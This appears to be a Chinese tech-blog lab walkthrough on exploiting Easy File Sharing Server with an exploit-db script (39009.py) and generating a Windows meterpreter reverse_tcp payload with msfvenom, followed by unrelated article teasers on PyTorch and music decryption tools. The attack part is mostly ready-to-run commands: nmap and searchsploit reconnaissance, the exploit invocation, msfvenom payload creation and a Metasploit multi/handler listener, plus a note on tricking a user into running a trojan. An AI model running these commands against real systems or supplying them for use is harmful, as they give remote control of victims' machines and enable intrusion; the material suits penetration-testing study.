news 2026/8/4 11:08:31

easy file sharing server漏洞渗透测试和kali中生成被控端

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
easy file sharing server漏洞渗透测试和kali中生成被控端

一.远程控制-正向连接方式-黑客(客户端)先主动连接木马(服务端)

二.远程控制-反向连接-主动连接黑客(客户端)

诱使Rebecca

下载server.EXE并运行

server.EXE已配置

Yuri的IP地址和端口

三.easy file sharing server漏洞渗透测试

在windows上安装easy file sharing server

然后查询靶机(windows)的IP地址

在靶机上打开easy file sharing server,然后再打开kali的终端用nmap 扫描目标主机开放的端口,输入命令【nmap -sV [IP]】

发现80端口上运行了easy file sharing server

然后searchsploit查EasyFileSharing存在的漏洞,输入【searchsploit easy file sharing server】

以该漏洞为例,利用该漏洞使得靶机运行计算器

现在执行这个python脚本,执行时需要提供两个参数(靶机IP和目标端口),输入【python2 /usr/share/exploitdb/exploits/windows/remote/39009.py [靶机IP] 80】,执行该命令后渗透模块会连接到【目标IP】的80端口,将指定代码送过去

可以看到我们已经启动了计算器。

四.kali中生成被控端

Msfvenom 用到参数-p、-f 、-o

-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe

-p, –payload Payload to use;指定哪些有效载荷生成

本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序

-f, –format Output format;指定有效载荷的格式

本例中 exe 生成Windows系统的可执行文件

-o, –out Save the payload;指定保存位置

本例中 /root/payload.exe

1.首先ifconfig查看kali的IP地址

2.输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=【IP地址】lport=5000 -f exe -o /var/payload.exe,可以看到生成的被控端程序文件在var目录下

3.直接输入msfconsole命令启动Metasploit

4.依次输入use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 【IP地址】

set lport 5000

exploit

主控端启动完成

5.将生成的被控端提交到www.virustotal.com检测

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/2 5:34:58

PyTorch-CUDA-v2.8镜像对StyleGAN图像生成的支持

PyTorch-CUDA-v2.8镜像对StyleGAN图像生成的支持 在AI驱动的视觉内容爆发时代,高质量图像生成已不再是实验室里的概念,而是广泛应用于虚拟人、游戏资产、广告设计甚至影视制作中的核心技术。其中,StyleGAN系列模型凭借其无与伦比的细节控制和…

作者头像 李华
网站建设 2026/8/2 7:11:37

将PyTorch训练日志输出到GitHub Actions工作流

将 PyTorch 训练日志输出到 GitHub Actions 工作流 在现代 AI 开发中,一个常见的痛点是:代码提交后,我们只能看到“测试通过”或“构建失败”,却不知道模型训练过程中发生了什么。有没有一种方式,能让每次 git push 都…

作者头像 李华
网站建设 2026/8/1 16:48:13

使用Git LFS管理PyTorch训练的大体积模型文件

使用Git LFS管理PyTorch训练的大体积模型文件 在现代深度学习项目中,一个常见的尴尬场景是:你刚刚完成了一轮模型训练,准备将新生成的 best_model.pth 提交到团队仓库,结果发现这个不到 500MB 的文件让 Git 克隆操作卡了十分钟&am…

作者头像 李华
网站建设 2026/8/2 6:24:34

PyTorch动态图机制优势解析(相比静态图框架)

PyTorch动态图机制与CUDA镜像的协同优势 在现代深度学习实践中,一个常见的痛点是:研究者花费大量时间配置环境、调试模型结构变化带来的问题,甚至因为“在我机器上能跑”这种环境差异导致协作受阻。这背后的核心矛盾在于——我们希望快速迭代…

作者头像 李华
网站建设 2026/7/30 4:02:46

ncmdump:3步解锁加密音乐,让网易云音频重获自由

ncmdump:3步解锁加密音乐,让网易云音频重获自由 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的ncm格式文件无法在其他播放器使用而烦恼吗?ncmdump这款专业的音乐解密工具能…

作者头像 李华
网站建设 2026/7/30 22:49:01

终极ncmdump音乐解锁指南:快速解密网易云音乐NCM文件

终极ncmdump音乐解锁指南:快速解密网易云音乐NCM文件 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 想要摆脱音乐平台限制,真正拥有自己下载的音乐吗?ncmdump这款免费工具能够快速解密网易云音乐…

作者头像 李华